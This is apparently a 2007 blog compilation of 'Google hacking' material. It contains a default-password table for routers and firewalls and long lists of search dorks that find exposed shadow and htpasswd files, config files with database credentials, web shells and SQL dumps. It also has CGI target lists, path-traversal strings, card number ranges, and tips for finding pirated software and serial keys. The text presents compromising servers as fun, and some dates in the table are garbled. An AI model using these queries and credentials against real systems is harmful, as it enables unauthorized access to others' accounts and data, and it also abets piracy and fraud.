Telnet Administrator admin Admin No 2005-15-4 2005-13-7 corecess 3113 Multi admin (none) Admin 2006-03-07 2006-03-07 creative 2015U Multi n/a (none) Admin 2005-10-13 2005-10-13 cuproplus bus Multi n/a (none) Admin 2006-09-29 2006-09-29 cyberguard all firewalls all console + passport1 cgadmin cgadmin Admin No 2003-22-1 2005-13-7 d-link 504g adsl router HTTP admin admin Admin from product doco No 2004-27-9 2005-13-7 d-link di-524 HTTP admin (none) Admin 2006-03-13 2006-03-13 d-link ads500g HTTP admin admin Admin 2006-09-16 2006-09-16 dlink adsl HTTP admin admin Admin 2006-01-21 2006-01-21 draytek Vigor3300 series Telnet draytek 1234 Admin 2006-09-27 2006-09-27 edimax wireless adsl router AR-7024 Multi admin epicrouter Admin 2006-04-10 2006-04-10 ericsson md110 pabx up-to-bc9 Multi (none) help varies depending on config minimal list access by default No 2002-1-10 2005-13-7 ericsson ericsson acc Multi n/a (none) Admin No 2002-1-10 2005-13-7 giga 8ippro1000 Multi Administrator admin Admin 2006-00-25 2006-00-25 hp sa7200 Multi admin admin Admin No 2002-1-10 2005-13-7 hp sa7200 Multi admin (none) Admin No 2002-1-10 2005-13-7 hp 2300 Multi admin admin Admin 2006-10-06 2006-10-06 iPSTAR iPSTAR Satellite Router/Radio v2 HTTP admin operator Admin For CSLoxInfo and iPSTAR Customers No 2004-23-3 2005-13-7 iPSTAR iPSTAR Network Box v.2+ HTTP admin operator Admin iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system. No 2004-26-5 2005-13-7 iblitzz BWA711/All Models All HTTP admin admin Admin This Information Works On All Models Of The Blitzz Line 2005-09-06 2005-09-06 ibm a20m Multi n/a admin Admin No 2002-1-10 2005-13-7 ihoi oihoh lknlkn HTTP Administrator pilou Admin 2006-03-05 2006-03-05 inchon inchon inchon Multi admin admin Admin inchon 2005-06-15 2005-06-15 intel netstructure 480t Telnet admin (none) Admin No 2002-1-10 2005-13-7 intex organizer Multi n/a (none) Admin No 2002-1-10 2005-13-7 ion nelu nel Multi n/a admin Admin vreau ceva 2006-03-15 2006-03-15 ion nelu nel Multi Administrator admin Admin vreau ceva 2006-03-15 2006-03-15 latis network border guard Multi n/a (none) Admin No 2004-10-10 2005-13-7 linksys ap 1120 Multi n/a (none) Admin No 2005-13-2 2005-13-7 longshine isscfg HTTP admin 0 Admin No 2004-21-11 2005-13-7 maxdata ms2137 Multi n/a (none) Admin No 2005-28-4 2005-13-7 mediatrix 2102 mediatrix 2102 HTTP admin 1234 Admin 2006-07-05 2006-07-05 medion Routers HTTP n/a medion Admin No 2004-21-11 2005-13-7 microRouter 900i Console/Multi n/a letmein Admin No 2002-1-10 2005-13-7 motorola vanguard Multi n/a (none) Admin No 2003-1-11 2005-13-7 mro software maximo v4.1 Multi SYSADM sysadm Admin No 2002-1-10 2005-13-7 netgear FM114P Multi n/a (none) Admin No 2004-18-7 2005-13-7 netgear sc101 management software admin password Admin 2006-09-05 2006-09-05 netgear DG834GT 192.168.0.1 Multi admin Password Admin 2006-09-28 2006-09-28 netscreen firewall Telnet Administrator (none) Admin No 2002-1-10 2005-13-7 netscreen firewall Telnet admin (none) Admin No 2002-1-10 2005-13-7 netscreen firewall Telnet operator (none) Admin No 2002-1-10 2005-13-7 netscreen firewall HTTP Administrator (none) Admin No 2002-1-10 2005-13-7 nortel dms Multi n/a (none) Admin No 2003-8-4 2005-13-7 nortel p8600 Multi n/a (none) Admin No 2005-23-2 2005-13-7 olitec sx 200 adsl modem router Multi admin adslolitec Admin default ip 192.168.0.250 No 2003-25-9 2005-13-7 olitec (Trendchip) sx 202 adsl modem router HTTP admin admin Admin Firmware: 2.7.0.9(UE0.B1C)3.3.0.23 2006-03-25 2006-03-25 ovislink WL-1120AP Multi root (none) Admin 2006-02-05 2006-02-05 panasonic cf 27 4 Multi n/a (none) Admin No 2004-6-7 2005-13-7 penril datability vcp300 terminal server Multi n/a system Admin No 2002-1-10 2005-13-7 planet Akcess Point HTTP admin admin Admin No 2004-6-2 2005-13-7 planet akcess point HTTP admin admin Admin 2006-09-17 2006-09-17 sagem fast 1400w Multi root 1234 Admin No 2005-01-30 2005-13-7 samsung n620 Multi n/a (none) Admin No 2002-1-10 2005-13-7 samsung modem/router aht-e300 Multi admin password Admin after reset 2006-07-02 2006-07-02 sharp AR-407/S402 Multi n/a (none) Admin No 2003-17-11 2005-13-7 siemens hipath Multi n/a (none) Admin No 2002-1-10 2005-13-7 silex technology PRICOM (Printserver) Multi root (none) Admin for telnet / HTTP No 2005-9-1 2005-13-7 sitara qosworks Console root (none) Admin No 2003-11-5 2005-13-7 smc smc 7904BRA Multi (none) smcadmin Admin 2006-07-09 2006-07-09 telindus telindus 2002 Telnet admin admin Admin 2005-11-02 2005-11-02 topsec firewall Multi superman talent Admin 2006-07-21 2006-07-21 us robotic adsl gateway wireless router wireless router support support super user access I find it on a manual 2005-11-08 2005-11-08 us21100060 hp omibook 6100 Multi n/a (none) Admin No 2004-18-5 2005-13-7 westell 2200 Multi admin password Admin No 2004-10-10 2005-13-7 wline w3000g HTTP admin 1234 Admin 2006-09-31 2006-09-31 xd xdd xddd Multi xd xd Admin No 2004-14-10 2005-13-7 xerox xerox Multi admin admin Admin No 2004-23-2 2005-13-7 xerox xerox Multi n/a admin Admin No 2004-23-2 2005-13-7 xerox work centre pro 35 HTTP admin 1111 Admin No 2005-27-4 2005-13-7 xyplex switch 3.2 Console n/a (none) Admin No 2002-1-10 2005-13-7

google serch codes

2007-10-16T05:32:00.000-07:00

SEARCH PATHS....... more to be added
*************************************
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
ALTERNATIVE INPUTS====================
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
there are to many people to thank for the bits of information cut and pasted
and added to form this paper
most have been collected from various forums , txt , doc's etc...like to thank
you all, its not intended to rip anyone
its just a combo of various search inputs...put on the one Paper to use as
a reference.
EOF

google serch all codes

2007-10-16T05:31:00.000-07:00

Google hacks
last reply by anikmitter Sunday, 1:06 AM EDTfirst posted by anikmitter Jul 3, 2:19 AM EDT Watch Querying for vulnerable sites or servers using Google’s advance syntaxes Using "Index of " syntax to find sites enabled with Index browsing A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. Here I shall discuss how one can use "index of" syntax to get a list links to webserver which has got directory browsing enabled. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily. Index of /admin Index of /passwd Index of /password Index of /mail "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess "Index of /secret" "Index of /confidential" "Index of /root" "Index of /cgi-bin" "Index of /credit-card" "Index of /logs" "Index of /config" Looking for vulnerable sites or servers using "inurl:" or "allinurl:" a. Using "allinurl:winnt/system32/" (without quotes) will list down all the links to the server which gives access to restricted directories like "system32" through web. If you are lucky enough then you might get access to the cmd.exe in the "system32" directory. Once you have the access to "cmd.exe" and are able to execute it then you can go ahead in further escalating your privileges over the server and compromise it. b. Using "allinurl:wwwboard/passwd.txt"(without quotes) in the Google search will list down all the links to the server which are vulnerable to "WWWBoard Password vulnerability".

google serch-3

2007-10-16T05:30:00.000-07:00

Using Google, and some finely crafted searches we can find a lot of interesting information.For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in. Try a few of these searches:intitle:"Index of" passwords modifiedallinurl:auth_user_file.txt"access denied for user" "using password""A syntax error has occurred" filetype:ihtmlallinurl: admin mdb "ORA-00921: unexpected end of SQL command"inurl:passlist.txt"Index of /backup""Chatologica MetaSearch" "stack tracking:"Amex Numbers: 300000000000000..399999999999999 MC Numbers: 5178000000000000..5178999999999999visa 4356000000000000..4356999999999999"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums"parent directory "MP3-xxx -html -htm -php -shtml -opendivx -md5 -md5sums"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sumsNotice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:?intitle:index.of? mp3You only need add the name of the song/artist/singer.Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:inurl:microsoft filetype:isoYou can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…"# -FrontPage-" inurl:service.pwdFrontpage passwords.. very nice clean search results listing !!"AutoCreate=TRUE password=*" This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/"http://*:*@www" domainnameThis is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net"http://*:*@www" bangbus or "http://*:*@www"bangbusAnother way is by just typing"http://bob:bob@www""sets mode: +k"This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.allinurl: admin mdbNot all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!allinurl:auth_user_file.txtDCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.eggdrop filetype:user userThese are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.intitle:index.of.etcThis search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!filetype:bak inurl:"htaccesspasswdshadowhtusers"This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.Let's pretend you need a serial number for windows xp pro.In the google search bar type in just like this - "Windows XP Professional" 94FBRthe key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.or if you want tofind the serial for winzip 8.1 - "Winzip 8.1"

google
foo1 foo2 (xx xx)
operator:foo
filetype:123
site:foo.com
intext:foo
intitle: fooltitle
allinurl:foo xx
links:foo
allintilte:foo.com

"-" "+"

()
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....pcanywherecif

"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPageCGI)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc)desktop port
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php phpwebshell

foo.org filetype:inc

ipsec filetype:conf
intilte:"error occurred" ODBC request WHERE (selectinsert) sql
intitle:"php shell*" "Enable stderr" filetype:php
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified word

intitle:config confixx login password

"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"

googlehoho""
administrator users
cache:foo.com

site:xxxx.com intext:
site:xxxx.com inurl:login
site:xxxx.com intitle:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
site:a2.xxxx.com intext:ftp://*:*
site:a2.xxxx.com filetype:asp
site:xxxx.com //N
site:xxxx.com intext:*@xxxx.com //N
site:xxxx.com intext: //N
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd

allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data

3) "http://*:*@www" domainname ISPip
3
4) auth_user_file.txt

5) The Master List

6) intitle:"welcome.to.squeezebox" 90
7) passlist.txt (a better way)

8) "A syntax error has occurred" filetype:ihtml

9) ext:php program_listing intitle:MythWeb.Program.Listing
10) intitle:index.of abyss.conf
11)ext:nbe nbe

12)intitle:"SWW link" "Please wait....."
13)

14) intitle:"Freifunk.Net - Status" -site:commando.de

15) intitle:"WorldClient" intext:"? (20032004) Alt-N Technologies."

17) intitle:open-xchange inurl:login.pl

20) intitle:"site administration: please log in" "site designed by emarketsouth"
21) ORA-00921: unexpected end of SQL command

22)intitle:"YALA: Yet Another LDAP Administrator"
23)welcome.to phpqladmin "Please login" -cvsweb
24)intitle:"SWW link" "Please wait....."
25)inurl:"port_255" -htm

27)intitle:"WorldClient" intext:"? (20032004) Alt-N Technologies."

0days

ext:php program_listing intitle:MythWeb.Program.Listing

inurl:preferences.ini "[emule]"

intitle:"Index of /CFIDE/" administrator

"access denied for user" "using password"

ext:php intext:"Powered by phpNewMan Version" path/to/news/browse.php?clang=../../../../../../file/i/want

inurl:"/becommunity/community/index.php?pageurl="

intitle:"ASP FileMan" Resend -site:iisworks.com

"Enter ip" inurl:"php-ping.php"

ext:conf inurl:rsyncd.conf -cvs -man

intitle: private, protected, secret, secure, winnt

intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql

"allow_call_time_pass_reference" "PATH_INFO"

"Certificate Practice Statement" inurl:(PDF DOC)

LeapFTP intitle:"index.of./" sites.ini modified
master.passwd

mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboardwebadmin

"# -FrontPage-" ext:pwd inurl:(service authors administrators users) "# -FrontPage-"

inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
etc (index.of)
ext:ini eudora.ini
ext:ini Version=... password
ext:txt inurl:unattend.txt

filetype:bak inurl:"htaccesspasswdshadowhtusers"

filetype:cfg mrtg "target[*]" -sample -cvs -example

filetype:cfm "cfapplication name" password

filetype:conf oekakibbs
filetype:conf sc_serv.conf

filetype:conf slapd.conf

filetype:config config intext:appSettings "User ID"

filetype:dat "password.dat"

filetype:dat wand.dat

filetype:inc dbconn

filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect

filetype:inf sysprep

filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd

filetype:ldb admin

filetype:log "See `ipsec copyright"

filetype:log inurl:"password.log"

filetype:mdb inurl:users.mdb

filetype:mdb wwforum

filetype:netrc password

filetype:pass pass intext:userid

filetype:pem intext:private

filetype:properties inurl:db intext:password

filetype:pwd service
filetype:pwl pwl

filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql ("values * MD" "values * password" "values * encrypt")
filetype:sql ("passwd values" "password values" "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password

filetype:url +inurl:"ftp://" +inurl:";@"

filetype:xls username password email

htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak

intext:"enable secret $"
intext:"powered by Web Wiz Journal"

intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified

intitle:dupics inurl:(add.asp default.asp view.asp voting.asp) -site:duware.com
----------------------------------------------------------------------------------------------------------------------

intitle:index.of intext:"secring.skr""secring.pgp""secring.bak"

inurl:"GRC.DAT" intext:"password"

inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample

inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample

inurl:"wvdial.conf" intext:"password"

inurl:/db/main.mdb

inurl:chap-secrets -cvs

inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs

inurl:lilo.conf filetype:conf password -tatercounter -bootpwd -man

inurl:nuke filetype:sql

inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs

inurl:perform filetype:ini
inurl:secring ext:skr ext:pgp ext:bak

inurl:vtund.conf intext:pass -cvs

inurl:zebra.conf intext:password -sample -test -tutorial -download

"Generated by phpSystem"
"generated by wwwstat"

"Host Vulnerability Summary Report" ]

"HTTP_FROM=googlebot" googlebot.com "Server_Software="

"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp

"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn Copyright (C)" ext:log

"Most Submitted Forms and Scripts" "this section"

"Network Vulnerability Assessment Report"

"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"

"phpMyAdmin" "running on" inurl:"main.php"

"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt

"Running in Child mode"

"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail filetype:eml filetype:mbox filetype:mbx ) intext:passwordsubject

(inurl:"robot.txt" inurl:"robots.txt" ) intext:disallow filetype:txt

-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp

FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
cgiirc.conf

data filetype:mdb -site:gov -site:mil

exported email addresses

ext:asp inurl:pathto.asp

ext:cgi inurl:editcgi.cgi inurl:file=

ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs

ext:dat bpk.dat
ext:gho gho

ext:ini intext:env.ini
ext:ldif ldif

ext:log "Software: Microsoft Internet Information Services *.*"
------------------------------------------------------------------------------------------
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb

filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname

filetype:cfg auto_inst.cfg

filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS

filetype:ctt ctt messenger

filetype:fp fp
filetype:fp fp -site:gov -site:mil -"cvs log"

filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key

filetype:myd myd -CVS
filetype:ns ns
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot Pluckerdb)

filetype:pot inurl:john.pot
------------------------------------------------------------------------------------------------------------------
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:rdp rdp

filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab

filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls

Ganglia Cluster Reports

haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...

iletype:log cron.log
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"

intext:(password passcode) intext:(username userid user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a

intext:SQLiteManager inurl:main.php

intitle:"Apache::Status" (inurl:server-status inurl:status.html inurl:apache.html)

intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "- weppos"

intitle:"FTP root at"
intitle:"index of" +myd size

intitle:"Index Of" -inurl:maillog maillog size

intitle:"Index Of" cookies.txt size

intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory

intitle:"index.of" .diz .nfo last modified
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
---------------------------------------------------------------------
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"

intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"welcome.to.squeezebox"

intitle:admin intitle:login
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx

intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"

inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
----------------------------------------------------------------------------------------------------------

Welcome to ntop!

"adding new user" inurl:addnewuser -"there are no domains"
(inurl:/cgi-bin/.cobalt/) (intext:"Welcome to the Cobalt RaQ")

filetype:php HAXPLORER "Server Files Browser"
intitle:"Web Data Administrator - Login"

inurl:ConnectComputer/precheck.htm inurl:Remote/logon.aspx
PHP Shell (unprotected)
PHPKonsole PHPShell filetype:php -echo
Public PHP FileManagers

"index of" / picasa.ini
"index of" inurl:recycler
"Index of" rar r nfo Modified
"intitle:Index.Of /" stats merchant cgi-* etc
"Powered by Invision Power File Manager" (inurl:login.php) (intitle:"Browsing directory /" )
"Web File Browser" "Use regular expression"

filetype:ini Desktop.ini intext:mydocs.dll

intext:"d.aspx?id" inurl:"d.aspx?id"
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
intitle:"album permissions" "Users who can modify photos" "EVERYBODY"
intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat
intitle:"HFS /" +"HttpFileServer"
intitle:"Index of *" inurl:"my shared folder" size modified
-------------------------------------------------------------------------------------------------------------------

"File Upload Manager v." "rename to"

ext:asp "powered by DUForum" inurl:(messagesdetailslogindefaultregister) -site:duware.com
ext:asp inurl:DUgallery intitle:"." -site:dugallery.com -site:duware.com
ext:cgi inurl:ubb_test

ezBOO "Administrator Panel" -cvs

filetype:cgi inurl:cachemgr.cgi
filetype:cnf my.cnf -cvs -example
filetype:inc inc intext:setcookie

filetype:php inurl:"viewfile" -"index.php" -"idfil
filetype:wsdl wsdl

intitle:"ASP FileMan" Resend -site:iisworks.com

intitle:"Index of /" modified php.exe

intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"

inurl:" WWWADMIN.PL" intitle:"wwwadmin"
inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"
inurl:"plog/register.php"
inurl:cgi.asx?StoreID

inurl:robpoll.cgi filetype:cgi

google serch-2

2007-10-16T05:28:00.000-07:00

Google Operators:
Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weaponsBasic Operators:+, -, ~ , ., *, "", , ORAdvanced Operators:allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Basic Operators !!
(+) force inclusion of something commonGoogle ignores common words (where, how, digit, single letters) by default:Example: StarStar Wars Episode +I(-) exclude a search termExample: apple –red(") use quotes around a search term to search exact phrases:Example: "Robert Masse"Robert masse without "" has the 309,000 results, but "robert masse" only has 927 results. Reduce the 99% irrelevant results
Basic Operators
(~) search synonym:Example: ~foodReturn the results about food as well as recipe, nutrition and cooking information ( . ) a single-character wildcard:Example: m.trix Return the results of M@trix, matrix, metrix…….( * ) any word wildcard
Advanced Operators: "Site:"
Site: Domain_nameFind Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domainExamples:site:http://rahulhackingarticles.wetpaint.com
Advanced Operators: "Filetype:"
Filetype: extension_typeFind documents with specified extensionsThe supported extensions are:- HyperText Markup Language (html) - Microsoft PowerPoint (ppt) - Adobe Portable Document Format (pdf) - Microsoft Word (doc) - Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb) - Lotus 1-2-3 - Microsoft Excel (xls) (wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri) - Lotus WordPro (lwp) - Rich Text Format (rtf) - MacWrite (mw) - Shockwave Flash (swf) - Text (ans, txt) Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible.Example: Budget filetype: xls
Advanced Operators "Intitle:"
Intitle: search_term Find search term within the title of a WebpageAllintitle: search_term1 search_term2 search_term3Find multiple search terms in the Web pages with the title that includes all these wordsThese operators are specifically useful to find the directory listsExample:Find directory list:Intitle: Index.of "parent directory"
Advanced Operators "Inurl:"
Inurl: search_termFind search term in a Web addressAllinurl: search_term1 search_term2 search_term3Find multiple search terms in a Web address Examples:Inurl: cgi-binAllinurl: cgi-bin password
Advanced Operators "Intext;"
Intext: search_termFind search term in the text body of a document.Allintext: search_term1 search_term2 search_term3Find multiple search terms in the text body of a document.Examples:Intext: Administrator loginAllintext: Administrator login
Advanced Operators: "Cache:"
Cache: URLFind the old version of Website in Google cacheSometimes, even the site has already been updated, the old information might be found in cacheExamples:Cache: http://rahulhackingarticles.wetpaint.com
Advanced Operators
..Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents Examples:Computer $500..1000DVD player $250..350
Advanced Operators: "Daterange:"
Daterange: - Find the Web pages between start date and end dateNote: start_date and end date use the Julian dateThe Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122Examples:2004.07.10=24531962004.08.10=2453258Vulnerabilities date range: 2453196-2453258
Advanced Operators "Link:"
Link: URLFind the Web pages having a link to the specified URLRelated: URLFind the Web pages that are "similar" to the specified Web pageinfo: URL Present some information that Google has about that Web pageDefine: search_termProvide a definition of the words gathered from various online sourcesExamples:Link: rahulhackingarticles.wetpaint.comRelated: rahulhackingarticles.wetpaint.comInfo: rahulhackingarticles.wetpaint.comDefine: Network security
Advanced Operators "phonebook:"
Phonebook Search the entire Google phonebook rphonebook Search residential listings only bphonebook Search business listings only Examples:Phonebook: robert las vegas (robert in Las Vegas)Phonebook: (702) 944-2001 (reverse search, not always work)The phonebook is quite limited to U.S.A

google serch

2007-10-16T05:24:00.000-07:00

